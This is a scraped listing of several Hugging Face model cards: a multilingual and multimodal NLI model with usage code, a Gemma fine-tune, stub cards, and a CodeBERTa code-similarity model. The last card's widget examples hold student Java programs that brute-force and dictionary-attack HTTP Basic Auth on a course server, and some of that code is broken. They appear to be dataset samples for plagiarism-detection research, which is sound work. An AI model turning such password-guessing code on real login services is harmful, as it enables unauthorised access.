bam_Latn, ban_Latn, bel_Cyrl, bem_Latn, ben_Beng, bho_Deva, bjn_Arab,
bod_Tibt, bos_Latn, bug_Latn, bul_Cyrl, cat_Latn, ceb_Latn, ces_Latn,
cjk_Latn, ckb_Arab, crh_Latn, cym_Latn, dan_Latn, deu_Latn, dik_Latn,
dyu_Latn, dzo_Tibt, ell_Grek, eng_Latn, epo_Latn, est_Latn, eus_Latn,
ewe_Latn, fao_Latn, pes_Arab, fij_Latn, fin_Latn, fon_Latn, fra_Latn,
fur_Latn, fuv_Latn, gla_Latn, gle_Latn, glg_Latn, grn_Latn, guj_Gujr,
hat_Latn, hau_Latn, heb_Hebr, hin_Deva, hne_Deva, hrv_Latn, hun_Latn,
hye_Armn, ibo_Latn, ilo_Latn, ind_Latn, isl_Latn, ita_Latn, jav_Latn,
jpn_Jpan, kab_Latn, kac_Latn, kam_Latn, kan_Knda, kas_Arab, kas_Deva,
kat_Geor, knc_Arab, knc_Latn, kaz_Cyrl, kbp_Latn, kea_Latn, khm_Khmr,
kik_Latn, kin_Latn, kir_Cyrl, kmb_Latn, kon_Latn, kor_Hang, kmr_Latn,
lao_Laoo, lvs_Latn, lij_Latn, lim_Latn, lin_Latn, lit_Latn, lmo_Latn,
ltg_Latn, ltz_Latn, lua_Latn, lug_Latn, luo_Latn, lus_Latn, mag_Deva,
mai_Deva, mal_Mlym, mar_Deva, min_Latn, mkd_Cyrl, plt_Latn, mlt_Latn,
mni_Beng, khk_Cyrl, mos_Latn, mri_Latn, zsm_Latn, mya_Mymr, nld_Latn,
nno_Latn, nob_Latn, npi_Deva, nso_Latn, nus_Latn, nya_Latn, oci_Latn,
gaz_Latn, ory_Orya, pag_Latn, pan_Guru, pap_Latn, pol_Latn, por_Latn,
prs_Arab, pbt_Arab, quy_Latn, ron_Latn, run_Latn, rus_Cyrl, sag_Latn,
san_Deva, sat_Beng, scn_Latn, shn_Mymr, sin_Sinh, slk_Latn, slv_Latn,
smo_Latn, sna_Latn, snd_Arab, som_Latn, sot_Latn, spa_Latn, als_Latn,
srd_Latn, srp_Cyrl, ssw_Latn, sun_Latn, swe_Latn, swh_Latn, szl_Latn,
tam_Taml, tat_Cyrl, tel_Telu, tgk_Cyrl, tgl_Latn, tha_Thai, tir_Ethi,
taq_Latn, taq_Tfng, tpi_Latn, tsn_Latn, tso_Latn, tuk_Latn, tum_Latn,
tur_Latn, twi_Latn, tzm_Tfng, uig_Arab, ukr_Cyrl, umb_Latn, urd_Arab,
uzn_Latn, vec_Latn, vie_Latn, war_Latn, wol_Latn, xho_Latn, ydd_Hebr,
yor_Latn, yue_Hant, zho_Hans, zho_Hant, zul_Latn
pipeline_tag: sentence-similarity
---
# Multilingual & Multimodal NLI (MMNLI)
The full details of the MMNLI model, including architecture, training, and evaluation, are described in the paper [Beyond Similarity Scoring: Detecting Entailment and Contradiction in Multilingual and Multimodal Contexts](https://www.isca-speech.org/archive/Interspeech_2025/paper286.pdf) by Istaiteh, O., Mdhaffar, S., & Estève, Y. (Interspeech 2025). Please cite this paper if you use the MMNLI model in your research.
This repository provides the **MMNLI model**, a multilingual and multimodal Natural Language Inference classifier.
It extends the BLASER architecture into **multiclass NLI**, supporting entailment, contradiction, and neutrality across text-text, text-speech, speech-text, and speech-speech input pairs.
The model is trained on the [oist/multimodal_nli_dataset](https://huggingface.co/datasets/oist/multimodal_nli_dataset).
Please refer to that dataset card for details.
### Results
On the test set of the dataset, the MMNLI model achieves an **F1-micro score of 0.749**.
---
## Usage
The model depends on **SONAR embeddings**. You can use the official SONAR encoders (for text and speech) [from GitHub](https://github.com/facebookresearch/SONAR/tree/main) or the **ported SONAR text encoder** [`cointegrated/SONAR_200_text_encoder`](https://huggingface.co/cointegrated/SONAR_200_text_encoder).
---
### Example 1: Speech–Text Inference
```python
import torch
from sonar.inference_pipelines.speech import SpeechToEmbeddingModelPipeline
from sonar.inference_pipelines.text import TextToEmbeddingModelPipeline
from transformers import AutoModel
# 1. Load SONAR encoders
speech_encoder = SpeechToEmbeddingModelPipeline(encoder="sonar_speech_encoder_eng")
text_encoder = TextToEmbeddingModelPipeline(encoder="text_sonar_basic_encoder", tokenizer="text_sonar_basic_encoder")
# 2. Encode premise (speech) and hypothesis (text)
premise_embs = speech_encoder.predict(["audio.wav"])
hypothesis_embs = text_encoder.predict(["The cat sat on the mat."], source_lang="eng_Latn")
# 3. Load MMNLI model
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs) # returns [batch_size, 3]
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 2: Text–Text Inference (Official SONAR)
```python
import torch
from sonar.inference_pipelines.text import TextToEmbeddingModelPipeline
from transformers import AutoModel
# 1. Load official SONAR text encoder
text_encoder = TextToEmbeddingModelPipeline(
encoder="text_sonar_basic_encoder",
tokenizer="text_sonar_basic_encoder"
)
# 2. Encode premise and hypothesis
premise_texts = ["Le chat s'assit sur le tapis."]
hypothesis_texts = ["The cat sat on the mat."]
premise_embs = text_encoder.predict(premise_texts, source_lang="fra_Latn")
hypothesis_embs = text_encoder.predict(hypothesis_texts, source_lang="eng_Latn")
# 3. Load MMNLI model
mmnli_model = AutoModel.from_pretrained("oist/multimodal_nli_model", trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs)
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 3: Text–Text Inference (Ported SONAR)
```python
import torch
from transformers import AutoTokenizer, AutoModel
from transformers.models.m2m_100.modeling_m2m_100 import M2M100Encoder
# 1. Load ported SONAR text encoder
sonar_model_name = "cointegrated/SONAR_200_text_encoder"
encoder = M2M100Encoder.from_pretrained(sonar_model_name)
tokenizer = AutoTokenizer.from_pretrained(sonar_model_name)
def encode_mean_pool(texts, tokenizer, encoder, lang='eng_Latn', norm=False):
tokenizer.src_lang = lang
with torch.inference_mode():
batch = tokenizer(texts, return_tensors='pt', padding=True)
seq_embs = encoder(**batch).last_hidden_state
mask = batch.attention_mask
mean_emb = (seq_embs * mask.unsqueeze(-1)).sum(1) / mask.unsqueeze(-1).sum(1)
if norm:
mean_emb = torch.nn.functional.normalize(mean_emb)
return mean_emb
# Example sentences
premise_sentences = ["Le chat s'assit sur le tapis."]
hypothesis_sentences = ["The cat sat on the mat."]
# 2. Encode premise and hypothesis
premise_embs = encode_mean_pool(premise_sentences, tokenizer, encoder, lang="fra_Latn")
hypothesis_embs = encode_mean_pool(hypothesis_sentences, tokenizer, encoder, lang="eng_Latn")
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# 4. Run inference
with torch.inference_mode():
logits = mmnli_model(premise_embs, hypothesis_embs) # returns [batch_size, 3]
pred_class = torch.argmax(logits, dim=-1).item()
print("Prediction:", pred_class)
# 0 = Entailment, 1 = Neutral, 2 = Contradiction
```
### Example 4: Using BLASER Semantic Score with MMNLI
You can use the BLASER semantic score in combination with the MMNLI NLI class to get a **better understanding of the relationship** between source and candidate translations. The NLI class gives the entailment/contradiction/neutral label, while the BLASER score provides a fine-grained semantic similarity.
```python
import torch
from transformers import AutoTokenizer, AutoModel
from transformers.models.m2m_100.modeling_m2m_100 import M2M100Encoder
# -------------------------
# 1️⃣ Load ported SONAR text encoder
# -------------------------
sonar_model_name = "cointegrated/SONAR_200_text_encoder"
encoder = M2M100Encoder.from_pretrained(sonar_model_name)
tokenizer = AutoTokenizer.from_pretrained(sonar_model_name)
def encode_mean_pool(texts, tokenizer, encoder, lang='eng_Latn', norm=False):
tokenizer.src_lang = lang
with torch.inference_mode():
batch = tokenizer(texts, return_tensors='pt', padding=True)
seq_embs = encoder(**batch).last_hidden_state
mask = batch.attention_mask
mean_emb = (seq_embs * mask.unsqueeze(-1)).sum(1) / mask.unsqueeze(-1).sum(1)
if norm:
mean_emb = torch.nn.functional.normalize(mean_emb)
return mean_emb
# -------------------------
# 2️⃣ Example sentences
# -------------------------
src_sentence = ["He is happy."]
mt_sentences = [
"Il est content.", # entailment blaser:4.515
"Il est malheureux." # contradiction blaser: 4.41
]
# Encode source and MT sentences
src_embs = encode_mean_pool(src_sentence, tokenizer, encoder, lang="eng_Latn")
mt_embs = encode_mean_pool(mt_sentences, tokenizer, encoder, lang="fra_Latn")
# -------------------------
# 3️⃣ Load MMNLI model
# -------------------------
mmnli_model_name = "oist/multimodal_nli_model"
mmnli_model = AutoModel.from_pretrained(mmnli_model_name, trust_remote_code=True)
mmnli_model.eval()
# -------------------------
# 4️⃣ Load BLASER QE model
# -------------------------
qe_model_name = "oist/blaser_2_0_qe_ported"
qe_model = AutoModel.from_pretrained(qe_model_name, trust_remote_code=True)
qe_model.eval()
# -------------------------
# 5️⃣ Run inference
# -------------------------
for i, mt_sentence in enumerate(mt_sentences):
mt_emb = mt_embs[i].unsqueeze(0) # keep batch dimension
# NLI prediction
with torch.inference_mode():
logits = mmnli_model(src_embs, mt_emb)
pred_class = torch.argmax(logits, dim=-1).item()
# BLASER semantic score
with torch.inference_mode():
qe_score = qe_model(src_embs, mt_emb) # shape [1, 1]
print(f"\nMT sentence: '{mt_sentence}'")
print("NLI prediction:", ["Entailment", "Neutral", "Contradiction"][pred_class])
print("BLASER semantic score:", qe_score.item())
```
---
## Labels
- 0 = Entailment
- 1 = Neutral
- 2 = Contradiction
---
## Citation
If you use this model, please cite:
```bibtex
@inproceedings{istaiteh2025beyond,
title={Beyond Similarity Scoring: Detecting Entailment and Contradiction in Multilingual and Multimodal Contexts},
author={Istaiteh, Othman and Mdhaffar, Salima and Est{\`e}ve, Yannick},
booktitle={Proc. Interspeech 2025},
pages={286--290},
year={2025}
}
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-9
|
vectorzhou
| 2025-09-23T16:52:32Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T15:41:34Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-EGPO-0.1-mnt64-0922195506-epoch-9", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/2zoaj66c)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
saptoji/blockassist
|
saptoji
| 2025-09-23T16:52:13Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"aquatic twitchy mallard",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-17T08:11:26Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- aquatic twitchy mallard
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
mb7419/bert-base-uncased-tesla-ic-tuned
|
mb7419
| 2025-09-23T16:51:35Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"bert",
"text-classification",
"arxiv:1910.09700",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-23T08:27:06Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
buelfhood/SOCO-Java-codeberta-cmnrl-triplets-ep1-bs256-lr5e-05-split0.2
|
buelfhood
| 2025-09-23T16:47:52Z | 0 | 0 |
sentence-transformers
|
[
"sentence-transformers",
"safetensors",
"roberta",
"sentence-similarity",
"feature-extraction",
"dense",
"generated_from_trainer",
"dataset_size:34368",
"loss:CachedMultipleNegativesRankingLoss",
"dataset:buelfhood/SOCO_TRAIN_java",
"arxiv:1908.10084",
"arxiv:2101.06983",
"base_model:huggingface/CodeBERTa-small-v1",
"base_model:finetune:huggingface/CodeBERTa-small-v1",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] |
sentence-similarity
| 2025-09-23T16:47:41Z |
---
tags:
- sentence-transformers
- sentence-similarity
- feature-extraction
- dense
- generated_from_trainer
- dataset_size:34368
- loss:CachedMultipleNegativesRankingLoss
base_model: huggingface/CodeBERTa-small-v1
widget:
- source_sentence: "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport\
\ java.util.*;\n\nclass BruteForce {\n\n String password=\"\";\n\n int num\
\ =401;\n\n\n public static void main (String[] args) {\n\n String str=\"\
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\";\n\n BruteForce URLcon;\n\
\n int length = 0;\n\n String passwd=\"\";\n\n int t0,t1;\n\n\
\ \n if (args.length == 0) {\n \t\n \tSystem.err.println (\n\
\ \t\t\n \t\t\"Usage : java BruteForce <username>\");\n \treturn;\n\
\ \t\n \t}\n String username = args[0];\n \n\n t0=System.currentTimeMillis();\n\
\n System.out.println (\" \" + new Date());\n \n System.out.println\
\ (\"Using BruteForce method attack \"+username+\"'s password.Please waiting.......\"\
);\n\n for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401)\
\ {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \
\ \tSystem.out.println(\"It took \"+ DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds.\");\n\n System.out.println (\"Finish \" + new Date());\n\
\ \n \treturn;\n\n }\n\n for\
\ (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ double dt =t1-t0;\n\n\n\n System.out.println(\"\
It took \"+ DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ System.out.println (\"Finish \" + new Date());\n \
\ \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\
\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\
\n URLcon = new BruteForce (passwd,username);\n\n \
\ if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\
\n System.out.println(\"The password: \"+ passwd);\n\n\n \
\ \t double dt =t1-t0;\n\n\n\n \tSystem.out.println(\"\
It took \"+DecimalFormat.getInstance().format(dt/1000)+ \" seconds.\");\n \
\ \n System.out.println (\"Finish \" + new\
\ Date());\n \n \t return;\n\n \
\ }\n\n\n }\n\n}\n}\n System.out.println(\" not find the\
\ password\");\n\n}\n\n public BruteForce (String password, String username){\n\
\n \t String urlString = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \
\ \n\n try {\n\n String userPassword = username+\":\"+password ;\n\
\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\
\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
sentences:
- "import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\
\nclass Dictionary {\n\n private String password=\"\";\n\n private int num=401;\n\
\n\n public static void main(String[] args) {\n\n\n Dictionary URLcon;\n\
\n int length = 0;\n\n String passwd=\"\";\n\n int t0,t1;\n\n\
\ String line =\"\";\n \n if (args.length == 0) {\n \t\n \
\ System.err.println (\n \t\t\n \t\t\"Usage : java BruteForce <username>\"\
);\n return;\n \t\n }\n \n String username = args[0];\n\
\ \n \n t0=System.currentTimeMillis();\n \n System.out.println\
\ (\" \" + new Date());\n System.out.println (\"Using Dictionary method\
\ attack \"+username+\"'s password. Please waiting.......\");\n\n try{\
\ BufferedReader in = new BufferedReader(new FileReader(\"/usr/share/lib/dict/words\"\
));\n\n while ((passwd=in.readLine())!=null) {\n\n \t URLcon\
\ = new Dictionary (passwd,username);\n\n if ((URLcon.num)!=401) {\n\
\n \tt1=System.currentTimeMillis();\n\n System.out.println(\"\
The password: \"+ passwd);\n\n \tdouble dt =t1-t0;\n\n \
\ \tSystem.out.println(\"It took \"+DecimalFormat.getInstance().format(dt/1000)+\
\ \" seconds\");\n \n System.out.println (\"Finish\
\ \" + new Date());\n \n \treturn;\n\n \
\ }\n\n\n \t}\n\n }catch (FileNotFoundException e){\n \t\
System.out.println(e);\n }catch (IOException e){\n \tSystem.out.println(e);\n\
\ }\n\n\n System.out.println(\" not find the password\");\n\n\n}\n\n\
\ public Dictionary (String password,String username) {\n\n \t String urlString\
\ = \"http://sec-crack.cs.rmit.edu./SEC/2/\" ;\n\n \n try {\n\n \
\ String userPassword = username+\":\"+password ;\n\n String encoding\
\ = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n\
\ URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection)\
\ url.openConnection();\n\n uc.setRequestProperty (\"Authorization\", \"\
\ \" + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n \
\ catch(MalformedURLException e){\n \t System.out.println(e);\n \
\ }catch(IOException e){\n System.out.println(e);\n }\n\n\n \
\ }\n}"
- "import java.util.*;\nimport java.io.*;\nimport java.*;\n\npublic class Dogs5\n\
{\n public static void main(String [] args) throws Exception\n { \n \
\ executes(\"rm index.*\");\n executes(\"wget http://www.cs.rmit.edu./students\"\
);\n\n while (true)\n {\n String addr= \"wget http://www.cs.rmit.edu./students\"\
;\n executes(addr);\n String hash1 = md5sum(\"index.html\");\n\
\ String hash2 = md5sum(\"index.html.1\");\n System.out.println(hash1\
\ +\"|\"+ hash2);\n \n BufferedReader buf = new BufferedReader(new FileReader(\"\
/home/k//Assign2/ulist1.txt\"));\n\n String line=\" \" ;\n String\
\ line1=\" \" ;\n String line2=\" \";\n String line3=\" \";\n\
\ String[] cad = new String[10];\n \n executes(\"./.sh\"\
);\n \n int i=0;\n while ((line = buf.readLine()) != null)\n\
\ {\n \n line1=\"http://www.cs.rmit.edu./students/images\"\
+line;\n if (i==1)\n line2=\"http://www.cs.rmit.edu./students/images\"\
+line;\n if (i==2)\n line3=\"http://www.cs.rmit.edu./students/images\"\
+line;\n i++;\n }\n System.out.println(line1+\" \"\
+line2+\" \"+line3); \n\n\n executes(\"wget \"+line1);\n executes(\"\
wget \"+line2);\n executes(\"wget \"+line3);\n \n String\
\ hash3 = md5sum(\"index.html.2\"); \n String hash4 = md5sum(\"index.html.3\"\
); \n String hash5 = md5sum(\"index.html.4\");\n\n \n\n\nBufferedReader\
\ buf2 = new BufferedReader(new FileReader(\"/home/k//Assign2/ulist1.txt\"));\n\
\n String linee=\" \" ;\n String linee1=\" \" ;\n String\
\ linee2=\" \";\n String linee3=\" \";\n\n executes(\"./ip1.sh\"\
);\n\n int j=0;\n while ((linee = buf2.readLine()) != null)\n\
\ {\n\n linee1=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n if (j==1)\n linee2=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n if (j==2)\n linee3=\"http://www.cs.rmit.edu./students/images\"\
+linee;\n j++;\n }\n System.out.println(line1+\" \"\
+line2+\" \"+line3);\n\n\n executes(\"wget \"+linee1);\n executes(\"\
wget \"+linee2);\n executes(\"wget \"+linee3);\n\n String hash6\
\ = md5sum(\"index.html.5\");\n String hash7 = md5sum(\"index.html.6\"\
);\n String hash8 = md5sum(\"index.html.7\"); \n \n \
\ boolean pict=false;\n if (hash3.equals(hash6))\n pict=true;\n\
\n boolean pict2=false;\n if (hash3.equals(hash6))\n \
\ pict2=true;\n \n boolean pict3=false;\n if (hash3.equals(hash6))\n\
\ pict3=true;\n\n \n if (hash1.equals(hash2))\n \
\ { \n executes(\"./difference.sh\");\n executes(\"./mail.sh\"\
);\n \n \n\n }\n else\n {\n if (pict\
\ || pict2 || pict3)\n {\n executes(\".~/Assign2/difference.sh\"\
); \n executes(\".~/Assign2/mail2.sh\");\n \
\ }\n\n executes(\".~/Assign2/difference.sh\");\n executes(\"\
.~/Assign2/mail.sh\");\n \n \n \n executes(\"./reorder.sh\"\
);\n executes(\"rm index.html\");\n executes(\"cp index.html.1\
\ index.html\");\n executes(\"rm index.html.1\");\n executes(\"\
sleep 5\"); \n } \n }\n }\n\n public static void executes(String\
\ comm) throws Exception\n {\n Process p = Runtime.getRuntime().exec(new String[]{\"\
/usr/local//bash\",\"-c\", comm });\n\n BufferedReader bf = new BufferedReader(new\
\ InputStreamReader(p.getErrorStream()));\n\n String cad;\n while((\
\ cad = bf.readLine()) != null)\n {\n System.out.println();\n\
\ }\n\t p.waitFor();\n }\n\n public static String md5sum(String file)\
\ throws Exception\n {\n String cad;\n String hash= \" \"; \n\
\n Process p = Runtime.getRuntime().exec(new String[]{\"/usr/local//bash\"\
,\n \"-c\", \"md5sum \"+file });\n\
\ BufferedReader bf = new BufferedReader(new InputStreamReader(p.getInputStream()));\n\
\n while((bf = cad.readLine()) != null)\n {\n StringTokenizer\
\ word=new StringTokenizer();\n hash=word.nextToken();\n System.out.println(hash);\n\
\ }\n return hash; \n\n }\n\n \n \n}\n\n"
- "import java.io.*;\nimport java.*;\nimport java.net.*;\n\npublic class BruteForce\n\
{\n public static void main(String[] args) throws Exception\n {\n \n\
\ String password = checkPassword(); \n\n System.out.println(\"Congratulations\
\ Your password is \"+ password );\n \n \n\n URL url = new URL(\"\
http://sec-crack.cs.rmit.edu./SEC/2/\");\n HttpURLConnection sec = (HttpURLConnection)url.openConnection();\n\
\ sec.setRequestProperty(\"Authorization\", \" \" + encode(\":\"+password));\n\
\ BufferedReader in = new BufferedReader(new InputStreamReader(sec.getInputStream()));\n\
\ String inputLine;\n\n while ((inputLine = in.readLine()) != null)\n\
\ System.out.println(inputLine);\n in.close();\n }\n\n \n\n \
\ private static String checkPassword() throws Exception\n {\n String\
\ Password=\" \";\n int attempt=0;\n URL url = new URL(\"http://sec-crack.cs.rmit.edu./SEC/2/\"\
);\n HttpURLConnection sec;\n String[] cad = {\"a\",\"b\",\"c\",\"d\"\
,\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n \
\ \"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"\
z\",\n \"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"\
I\",\"J\",\"K\",\"L\",\"M\",\n \"N\",\"O\",\"P\",\"Q\",\"\
R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"};\n\n for (int i=0; i\
\ < cad.length; i++)\n {\n for (int j=0; j< cad.length;j++)\n \
\ {\n for (int k=0; k<cad.length;k++)\n {\n \
\ attempt++;\n String Passwd = new String(cad[i]+cad[j]+cad[k]);\n\
\ String userPasswd= \":\"+Passwd;\n System.out.println(attempt+\"\
\ \"+userPasswd);\n \n sec = (HttpURLConnection)url.openConnection();\n\
\ sec.setRequestProperty(\"Authorization\", \" \" + encode(userPasswd));\n\
